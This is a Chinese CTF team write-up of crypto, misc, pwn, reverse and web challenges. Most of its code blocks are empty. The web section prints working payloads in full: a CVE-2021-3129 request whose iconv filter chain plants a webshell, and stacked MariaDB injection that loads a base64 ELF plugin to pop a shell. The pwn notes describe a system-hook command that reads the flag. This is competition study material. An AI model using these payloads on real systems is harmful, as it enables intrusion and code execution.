Crypto
e2W@rmup
Sovled by: tl2cents
详细 wp 更新至博客 https://tl2cents.github.io/
这种形式的 nonce 生成方式来自于 Bitcoin 中一种窃取私钥的后门 ECDSA 签名。详情可以参考这篇论文:the curious case of the half-half bitcoin ecdsa nonces。构造基本格再用 Recentering 优化以下最短向量的长度就能得到私钥。
exp
|
|
e2D1p
Sovled by: tl2cents, lyciumlee, zjlhhh123, fcy
详细 wp 更新至博客 https://tl2cents.github.io/
基本思路与去年 n1ctf 类似,将所有 mask 转换为比特向量,构建矩阵 ,先求左核空间,再求 LLL reduction(可以直接放在一个拓展格里面计算 LLL),就能得到一系列小的指数 e_i,满足(第一个方程组可以不用显示地加入矩阵 M 中)
$$\sum_{1}^{200} e_i = 0, \ \sum_{1}^{200} e_i \cdot M[i] = \vec 0$$
从而使得
$$\prod c^{e_i} = 0 \mod p $$
将负的指数(取绝对值)和正的指数,分别计算成左值和右值,然后相减即可得到 p 的整数倍,通过多组数据就能求 GCD 恢复出 p 。
之后在 QQ 上计算系列向量
$$(1,0,\cdots,0), (0,1,\cdots,0), \cdots, (0,0,\cdots,1)$$
的解,转换到整数环上,就可以逐比特恢复 flag 的值。
Exp
LLL & GCD 求模数 p
|
|
逐比特恢复 flag
|
|
e2$m4
Sovled by: tl2cents, zjlhhh123, Ichild
完整 c 代码和后续脚本之后更新到个人博客(https://tl2cents.github.io/)
非预期,爆破轮密钥即可,每个轮密钥 32 比特,恢复 4 个轮密钥的实际复杂度为 $$2^{34}$$。 验证轮密钥正确性的方法如下,每轮加密的流程为下面两个步骤
- tfunc : buf[i+4] = buf[i] ^ tfunc(buf[i+1]^buf[i+2]^buf[i+3]^rk[i]) , 与轮密钥相关,与 dance time 无关。
- pfunc : buf[i+1:i+5] = pfunc(buf[i+1:i+5]),与轮密钥无关,与 dance time 有关。
假设 dance time 为 31,30 的两个相同明文加密的密文为 c1,c2。最后一次使用的 dance sbox 是相同的,我们穷举最后一轮的轮密钥, 将其解密一个 round,此时我们得到可能的在第 31 轮加密后密文 c1_t , c2_t ,此时 pfunc 使用的 dance box 是不一样的,注意到 pfunc 与轮密钥无关,因此我们再继续把 c1_t, c2_t 经过逆 pfunc 的过程得到 c1_final, c2_final,此时如果我们选取的最后一轮轮密钥 rk 是正确的,那么得到的两个密文 c1_final, c2_final 应该是完全相同的!(前面 30 轮加密完全相同)
恢复连续四轮轮密钥,即可恢复整个 32 轮的轮密钥。
修改 sm4 的开源 c 代码 https://github.com/siddontang/pygmcrypto/blob/master/src/sm4.c
关键 brute 函数
|
|
4 min 恢复 round key
Misc
guess by cyberutopian
Sovled by: thiner, ucasqsl
souffle是一种datalog类语言。简而言之,这门语言使用一阶谓词逻辑的推演作为控制流。学习过程省略(大三的一门叫人工智能基础的课就会讲)。
.functor hash1(x:symbol):number
.functor hash2(x:symbol):number
.functor GETFLAG():symbol
.decl SALT(x:symbol)
//SALTS
.output SALT
.decl FLAG(x:symbol)
FLAG(@GETFLAG()).
.decl HINT(x:symbol)
HINT(substr(x,0,4)) :- FLAG(x).
.decl HASH(x:number)
HASH(@hash1(x)) :- FLAG(x).
.decl SALT_HASH1(h:number,s:symbol)
SALT_HASH1(h,s) :- h=@hash1(cat(flg,s)),FLAG(flg),SALT(s).
.decl SALT_HASH2(h:number,s:symbol)
SALT_HASH2(h,s) :- h=@hash2(cat(flg,s)),FLAG(flg),SALT(s).
.decl GUESS(x:symbol)
//GUESS
.output GUESS(attributeNames="ans")
.limitsize GUESS(n=1)
FLAG和GUESS以及HINT, SALT_HASH1, SALT_HASH2都是一阶谓词,带上参数表示命题。@hash1, @hash2, @GETFLAG是出题人写的库里的函数
简单来说,我们需要找到一种推理规则,使得这个推理规则能够推理出GUESS(flag)。
我们已知FLAG(flag)成立,那么直接来说我们写
GUESS(x) :- FLAG(x)
就应该能获得flag了。正是在此时我们发现了题目屏蔽了一些字符
|
|
如果字母F被屏蔽了,那么FLAG命题和GETFLAG函数都没法调用了。
因此,我们需要使用HINT, SALT_HASH1, SALT_HASH2等来恢复出flag。
从哈希恢复出flag的思路很不可能,因为哈希函数每个字符处都会把累积变量乘上一个偶数,因此32个字符开外的东西无法对哈希造成影响。
我们在查看souffle文档的时候发现了以下内容
https://souffle-lang.github.io/types#type-conversion
Converts the expression as(a, Variable) to an expression of type Variable although a is of type VariableOrStackIndex. Note that type casts between numbers and symbols are particular dangerous because strings for certain ordinal numbers may not exist. E.g., the fact A(as(1034234234, symbol). most likely will cause troubles in conjunction with an output directive since a symbol with ordinal number 1034234234 may not exist.
这段话说字符串和整数之间的转换很危险。危险的东西是我们的好朋友,盲猜字符串的数字表示形式是指针。我们拿着一个字符串,加个偏移就可能能拿到flag。
不过,我们尝试打印SALT字符串的时候发现数字表示形式实际上是0 1 2 3 … 10这种编号。
我们试了以下payload来试图拉取flag
SALT_HASH1(_,_), u = max t: {SALT(s), t=as(s,number)}, x = as(u+1,symbol)
发现,flag能拉到,但是GUESS因为在输出里不是第一个出现,会被服务器报错。
Souffle error? b'---------------\nSALT\nx\n===============\no/os2q/qqF9ithosyo0Wqo/9o/D8l.\nrysnq0q9yim/.t2.gs8e0wc2//tys\n200q.qygtmqn0qqo9a0sn2i\ns7y.m806eqyqe7lq92.q://.n6\n===============\n---------------\nGUESS\nans\n===============\n0c0f8d1094b913ff787b3e23a5b4e125ada00e0fbdb8d017a2a6790ca9e27123\n===============\n'
后来我们聪明了,学会使用HINT而不是SALT了(因为HINT只依赖FLAG)
HINT(s), x = as(as(s, number)-1,symbol)
这就过了。
exp:
|
|
downloader
Sovled by: surager
通过 .wgetrc 指定下载目录以及 timestamping (用于覆盖文件)。
dir_prefix = /app
add_hostdir = off
timestamping = on
然后写一个 run.sh 用于覆盖 /app/run.sh
|
|
结束。
Pwn
n1canary
Sovled by: Csome, surager
题目没给 libc,没开 PIE,Partial RELRO。题目本身也开了 canary。有 backdoor,C++ 自己写了个 BOFApp。开局输入一个 64 字节的 canary,然后取对象开始执行。
有try catch,可以用以下 payload 触发任意 call:b"1" * (0x68) + p64(0x403407) + p64(A):
|
|
n1sub
Sovled by: V1me, hawk
UAF,但是随机大小,随机偏移。
Vuln buf 分配的 flag 带有 GFP_KERNEL_ACCOUNT,所以可以用 pipe_buffer。
又因为 pipe_buffer 可以 resize,所以可以 cover 住很多随机的 size。
所以思路就是触发 vuln buf 的 free,喷上各种 size 的 pipe_buffer。
然后使用 pipe_primitive,有 0x8/0x28 也就是 1/5 的概率能改到 flag。
把 flag 的最低字节改成 0x10 即可。
|
|
n1array
Sovled by: C10-v, eqqie
主要还是逆向工作。
题目大体维护了一个hash表,每个表项对应一个array
每个array有一个name(用于hash索引),有一个type(byte)数组和value(int)数组。理论上这两个数组应该等长。
然而value有两种模式,在输入的时候可以选择:
- 正常数组,用户自己输入每一位的值
- default数组,用一个输入的位(记为is_default)来标记,如果置位,则认为这个数组的所有值都是用户输入的default值。且用户无需在后面输入每一位的值,即这个输入占空间很短。
用户在输入的时候,可以输入三种atom(name,type,value),顺序不限,次数不限,理论上后输入的会覆盖前输入的。
但是看parsevalue,当先输入一个正常的value数组(记为value1),再输入一个default数组(记为value2),可以发现,array->value.buf指向第一个输入的value1_atom.buf,但是array->num会被置为第二个输入的value1_atom.nelts。
当atom懂读取完,会根据array->value.buf是否有值来设置array->num;继续观察printvalue和editvalue时,发现这两个函数判断是不是default数组的逻辑依据是array->value.buf。
也就是说,我们可以用value2_atom.nelts的长度去索引value1_atom.buf,而value2_atom.nelts基本没什么限制,所以就有了堆上的任意读写。
那么题目就简单了,首先通过溢出读,利用unsortedbinleak,来泄露libc地址,并且其他的堆块上是有指向堆的指针的,所以也可以泄露堆地址。
然后通过溢出写,在array1->value.buf[]上editval溢出到临近的array2上可以edit的value或者type指针,写成目标地址addr,最后在array2上editval,就能在目标地址addr上任意写东西了。
libc2.31-0ubuntu9.7_amd64,有freehook。
|
|
n1proxy
Sovled by: eqqie, h1k0, C10-v
rust题,实现了一个远端的proxy代理。
首先是打板子,密钥交互,每次交互要验证消息,方式为sha256-pkcs1v15[rsa-dec(key_pri,text)],先签名后摘要。(打板子是花的时间最多的)
建立连接后,开始进入主逻辑部分。用户输入Proxytype和ProxyStatus
type就是连接类型,对应协议族,可以选TCP、UDP、Unix-socket等。
Status对应功能。
connect:输入地址,用远程主机对指定地址建立连接(就是代理),返回连接的fd
close:输入fd,关闭fd对应的代理连接
send:输入fd和数据,向fd对应的连接发数据
recv:输入fd和长度,从fd对应的连接读指定长度的字节
listen:只支持unixsocket。输入ip-port,建立一个监听(unix本地文件为hash(ip|port))然后阻塞到accept,直到这个accept获得一个连接(配合上面的connect来使用),返回accept的返回值。这个看起来是一个测试功能,可以配合connect来建立一个双工管道。
proxy的整体协议交互方式如下:
(handshake)
server --> client | HELLO_MSG: "n1proxy server v0.1"
client --> server | CLIENT_HELLO: "n1proxy client v0.1"
client --> server | conn_type
server --> client | key_exchange_sign, key_exchange
client --> server | client_verify_len, client_verify
client --> server | client_key_len, client_key_n
client --> server | client_key_len, client_key_e
server --> client | new_session_sign, new_session[E_cli(session_key), E_cli(time)]
(new session)
client --> server | E_sess(pre_conn[type_u32, status_u32, signature])
server --> client | E_sess(ok_msg[ok_msg, key_exchange_sign])
(connection operations)
switch status:
Listen:
client --> server | E_sess(conn_data[host_len, host, port, signature])
// new_unix_socket_listen(&target_host, target_port)
server --> client | E_sess(resmsg[conn_fd, key_exchange_sign])
Close:
client --> server | E_sess(conn_data[fd, signature])
// close(fd)
server --> client | E_sess(resmsg[0, key_exchange_sign])
Conn:
client --> server | E_sess(conn_data[host_len, host, port, signature])
// ProxyType::Tcp => my_connect(&target_host, target_port)?,
// ProxyType::Udp => my_new_udp_connect(&target_host, target_port)?,
// ProxyType::Sock => new_unix_socket_connect(&target_host, target_port)?,
server --> client | E_sess(resmsg[conn_fd, key_exchange_sign])
Recv:
client --> server | E_sess(conn_data[fd, data_size_u64, signature])
// TCP: my_read(fd, data, len);
// ProxyType::Udp => my_recvfrom(target_fd, recv_data_size as usize)?,
// ProxyType::Sock => my_recv_msg(target_fd, recv_data_size as usize)?,
server --> client | E_sess(resmsg[data[recv_data_len, recv_data], key_exchange_sign])
Send:
client --> server | E_sess(conn_data[fd, data_size_u64, data, signature])
// TCP: my_write(fd, data, len);
// ProxyType::Udp => my_sendto(target_fd, &send_data)?,
// ProxyType::Sock => my_send_msg(target_fd, &send_data)?,
server --> client | E_sess(resmsg[send_res, key_exchange_sign])
本来rust本身应该会有比较完善的网络通信支持,但是这题用了libc包,转而用POSIX接口去调用glibc的接口,且每一次调用glibc的时候都会包上unsafe,这样就导致了一些隐性的漏洞。
我们最终找到的点在这里:
|
|
大体来说,第三行的recv_iov[0].iov_base,在第四行申请,但是第六行以后就生命周期就结束了,但是由于引用的未知都是 unsafe 块,因此编译器可能无法检测。于是在 16 行的 recvmsg 会存在 UAF 向被释放的内存块写入双工管道读出来的数据,而 21 行会重新申请相同大小的内存块,并尝试往里面拷贝刚刚读出来的内容。
接下来的内容都是测试得出的,因为对rust的具体实现不清楚,所以只能硬搬ptmalloc,libc2.27那套了。
首先,进一次my_recv_msg申请一个足够大的chunk,直接跑一次,按照上面的流程,uaf的时候输出的是一个unsorted_bin(或者large_bin,无法稳定复现)的chunk,其8:16位的值稳定末尾ca0,也就是喜闻乐见的mainarena+96。0:8位有时候也是libcleak,有时候是不稳定的堆地址,不太好用。
然后就是尝试直接进行tcache的next指针任意malloc。再进入my_recv_msg,申请一个较小的堆块,16行的uaf写入freehook(此时应该是tcache的next指针被篡改了),在21行的时候会有大概同样大小的多次malloc,并且会将16行写入的内容copy到其中一次被劫持的malloc出来的地址上去。
(不要问这个结果是怎么得出的,真的就是随便试试写个freehook结果调试就siggev到到freehook上了,咱也不知道怎么莫名其妙就成功了)
于是稍微调整下,将malloc劫持的地址转换为freehook-0x10,然后写的东西是p64(freehook-0x10)+p64(addr1)+p64(system),这样freehook就被写成system了。
addr1是啥呢,根据测试,首先是tcache_key的检查,但是理论上随便篡改就能过,后来验证了下在这个2.27的小版本上只有写addr1=heap_base+0x10会报abort错,大概触发了tcache的doublefree检测。
但是似乎也不能乱写东西,比如这里应该就会对8:16上的值作为一个地址进行写入(推测是rust背后的堆行为),所以我们最后addr1写了一个可写地址进去,就能正常通过了。(作为反例,我们试过劫持时写入p64(freehook-0x8)+p64(system),结果报了访存错误,大概原因是system地址不可写)
后面所有的free都会变成system。而system在找不到path时只会报错,不会影响主进程,所以后面随便申请一个内容为命令字符串的堆块,总会被free掉进而执行我们的命令。
题目没给stdio,但是system执行的时候可以通过fd进行重定向。在这题里面随便找个连接的fd进行重定向就可以了,例如我们的脚本中9号fd就是一个和rust进程和python交互的连接fd(理论上不稳定,题目是多线程,同容器多次运行脚本的时候fd会变,但大体可以预测),直接cat /home/ctf/flag >&9就能在python的窗口收到loglevel=debug的recv信息,直接打出flag。
怎么说呢,这题就没下断点调过,因为真的不知道怎么下(
|
|
Reverse
h2o
Sovled by: Ichild
跟hitcon的lessequalmore相同。
先用python抄出来模拟执行,打出执行的指令,直接生成了2亿行,文本文件都占了4个G。后续去除重复的指令,得到2w行的代码
|
|
先找模式,使用正则匹配将某些操作化简,化简得到6k行代码。剩下就是苦力活,花10h手动逆向关键逻辑,得到:
|
|
再化简,得到
|
|
还有几个函数没逆了,但是看逻辑就能猜出来是什么运算,上面这些逻辑已经很清楚了,是个魔改的xtea。
求解:
|
|
N1LLua
Sovled by: lxr, Ichild
得到主逻辑 main.lua,使用 luadec -dis 可以看字节码
基本就是加载一个 lua52 的模块然后调用,进行加密
得到加密逻辑,tea 的结构
|
|
逆向分析 v_execute 函数,发现 pow 被改成了自定义的加密操作
然而这时也无法正常解密,所以在 pow 和 内置的 bxor 函数下断点,跟一下加密,发现还存在一个 »6 ^ 0x15734145 的操作
然后从 dnspy 反编译的 Assembly-CSharp.dll 提取一下 cipher 就可以了,
|
|
Addition Plus
Sovled by: mcsage, surager, Cur1ed
0x1344 这个地址的 call 会依次调用以下函数:
- 0x15B0
- 0xbc90
- 0x14200
- 0x1d4c0
- 0x28120
- 0x33390
- 0x39f50
- 0x436c0
函数内部是一组约束:
|
|
Flag checker将输入每8字节为一组,分别调用以上8个函数,将返回值与rodata初始值进行比较。
直接使用z3求解,得到flag
n1go
Sovled by: Ichild
给的go源码,字符串被混淆了,先提取出来
|
|
1M变成了200多K。里面有很多重复的字符串,应该都是失败的提示。需要找一下提示成功的字符串,这样方便定位最终目标。提取字符串:
|
|
源码中搜一下找到 congratulation 只有一个函数,从main进入可以看到每次读入一个字符后根据输入值进入不同函数,明显是个图问题,只要解析出来图结构找路径就行了。源码太规范了,直接简单处理就能解析。
|
|
Web
strangeport
Sovled by: byc_404, rmb122
题目可以与acitveMQ openwire端口交互,拿0day直接打会受到不出网的限制,因此只能退而求其次变为SSRF. ssrf 触发Gson反序列化时,发现Gson还原对象在有无参构造方法的情况下会调用无参构造方法,否则是Unsafe实例化,之后再通过反射设置属性。
根据后续提示,需要寻找constructor到Runtim.getRuntime().exec()的链子,linux环境下不难想到打印机服务相关的PrintService相关类,最终定位到PrintServiceLookupProvider,其正好会起一个内部类作为新线程,拼接外部类的成员变量进行命令执行。因此可以RCE
最后解决flag外带问题,写个class到/tmp下再执行,将flag内容加到activeMQ 的新queue里去,本地client连上去即可
echo xxx|base64 -d >/tmp/Main.class
java -cp /opt/apache-activemq/lib/optional/*:/tmp/:/opt/apache-activemq/activemq-all-5.17.5.jar Main
|
|
laravel
Sovled by: rmb122
CVE-2021-3129 修改一下利用方式, 通过 php filter chain 构造出 webshell 后直接写进 /var/www/html/index.php 即可
POST /_ignition/execute-solution HTTP/1.1
Host: chall-756f4e676a5a567a.sandbox.ctfpunk.com
Pragma: no-cache
Cache-Control: no-cache
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: XSRF-TOKEN=eyJpdiI6ImYzbmFzbmhCL0J3ZHVhUzJhVUFTS1E9PSIsInZhbHVlIjoiUy9sSU9XL0taMFY0aTI2enYrLzUxN3pTZXNOVjBvMjRyRU1MUFhya3BrTDJpcW54YjFNMDJWZlVZeC8xdFcwUlZQVEN6WWFvdVM4bG5UQ3lTVWtDMVFTR0dkcFdicFU4N0M2a0pIS0JrWEk4a0NMZEU2SUR6eDJxWFFBZFRvWmkiLCJtYWMiOiIwZGUzN2MxZDgzNWI3ZWU1NTIyOGY0NTQ1NWE5NDJmNzI0MWE2ZjIyMDA5ZTE0YmM3OTAwZWE2NWQ0MTA1NGMxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjRJWjFGVlBFQXJNNXRieTRySHBsZWc9PSIsInZhbHVlIjoiRGxyNVNEQ3p2RXlMc3Y3WVM2YVlhb2FwNG9vSUpjam9ZZU0rSHQ0MVNtOWZLR3hjaWR6MlpKS3FhT2ZQUU14VWdyQThWY3FNVUhuazdoZzY4N3preXVLOFd3RUtyRUQ5SnlmVUJWbkR4YTZGL1h2MCs4b3d4YUZ3ajU2OG9iWmoiLCJtYWMiOiJhMWUyODA2ODRlYzY0MTEyMzY5ZTYyZWM0MWU1MDQ1ZTVlZjZjNzhiMGMyOWM2NjRhOWYyY2U3OTUxMWE4MzU3IiwidGFnIjoiIn0%3D
sec-gpc: 1
Connection: close
Content-Type: application/json
Content-Length: 6640
{
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName": "xxx",
"viewFile": "php://filter/read=convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/var/www/html/public/index.php"
}
}
ezmaria
Sovled by: rmb122, crumbledwall, z3ratu1
load_file 可以直接读文件, 并且题目就放在 /var/www/html/index.php
1 union select 1,(select load_file("/var/www/html/index.php")) limit 1,1
过滤以下语句
|
|
题目支持堆叠注入, 虽然不能用 CREATE FUNCTIOIN, 但是可以用 INSTALL PLUGIN / SONAME 来加载动态链接库
同时 dumpfile 没有被 ban, 可以直接写文件
1; select from_base64('xx') into dumpfile '/mysql/plugin/xxx.so';
但是调了一会发现 PLUGIN INSTALL 不上, 最后发现是因为 mysql 库不存在, 手动创一个即可
第一步先弹个 shell
1;create database mysql;create table mysql.plugin(name varchar(64), dl varchar(128));select FROM_BASE64('f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAAAAAAAAAAABAAAAAAAAAAIgzAAAAAAAAAAAAAEAAOAALAEAAHAAbAAEAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAUAAAAAAABQBQAAAAAAAAAQAAAAAAAAAQAAAAUAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAAAAAtAQAAAAAAAC0BAAAAAAAAABAAAAAAAAABAAAABAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAALwAAAAAAAAAvAAAAAAAAAAAEAAAAAAAAAEAAAAGAAAA8C0AAAAAAADwPQAAAAAAAPA9AAAAAAAAIAIAAAAAAAAoAgAAAAAAAAAQAAAAAAAAAgAAAAYAAAAILgAAAAAAAAg+AAAAAAAACD4AAAAAAADAAQAAAAAAAMABAAAAAAAACAAAAAAAAAAEAAAABAAAAKgCAAAAAAAAqAIAAAAAAACoAgAAAAAAADAAAAAAAAAAMAAAAAAAAAAIAAAAAAAAAAQAAAAEAAAA2AIAAAAAAADYAgAAAAAAANgCAAAAAAAAJAAAAAAAAAAkAAAAAAAAAAQAAAAAAAAAU+V0ZAQAAACoAgAAAAAAAKgCAAAAAAAAqAIAAAAAAAAwAAAAAAAAADAAAAAAAAAACAAAAAAAAABQ5XRkBAAAADggAAAAAAAAOCAAAAAAAAA4IAAAAAAAABwAAAAAAAAAHAAAAAAAAAAEAAAAAAAAAFHldGQGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAUuV0ZAQAAADwLQAAAAAAAPA9AAAAAAAA8D0AAAAAAAAQAgAAAAAAABACAAAAAAAAAQAAAAAAAAAEAAAAIAAAAAUAAABHTlUAAQABwAQAAAABAAAAAAAAAAIAAcAEAAAAAAAAAAAAAAAEAAAAFAAAAAMAAABHTlUAl5TaBMInVtEwY4HpQmUv/Wfxkv4AAAAAAgAAAAYAAAABAAAABgAAAAAAAAAiAAAAAAAAAAYAAABlaJ58AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAFoAAAASAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAgAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAEYAAAAiAAAAAAAAAAAAAAAAAAAAAAAAAFUAAAASAAwACREAAAAAAAAWAAAAAAAAAABfX2dtb25fc3RhcnRfXwBfSVRNX2RlcmVnaXN0ZXJUTUNsb25lVGFibGUAX0lUTV9yZWdpc3RlclRNQ2xvbmVUYWJsZQBfX2N4YV9maW5hbGl6ZQB0ZXN0AHN5c3RlbQBsaWJjLnNvLjYAR0xJQkNfMi4yLjUAAAAAAQACAAEAAQACAAEAAAABAAEAYQAAABAAAAAAAAAAdRppCQAAAgBrAAAAAAAAAPA9AAAAAAAACAAAAAAAAAAAEQAAAAAAAAA+AAAAAAAACAAAAAAAAACwEAAAAAAAAAhAAAAAAAAACAAAAAAAAAAIQAAAAAAAAPg9AAAAAAAAAQAAAAYAAAAAAAAAAAAAAMg/AAAAAAAABgAAAAEAAAAAAAAAAAAAANA/AAAAAAAABgAAAAMAAAAAAAAAAAAAANg/AAAAAAAABgAAAAQAAAAAAAAAAAAAAOA/AAAAAAAABgAAAAUAAAAAAAAAAAAAAABAAAAAAAAABwAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA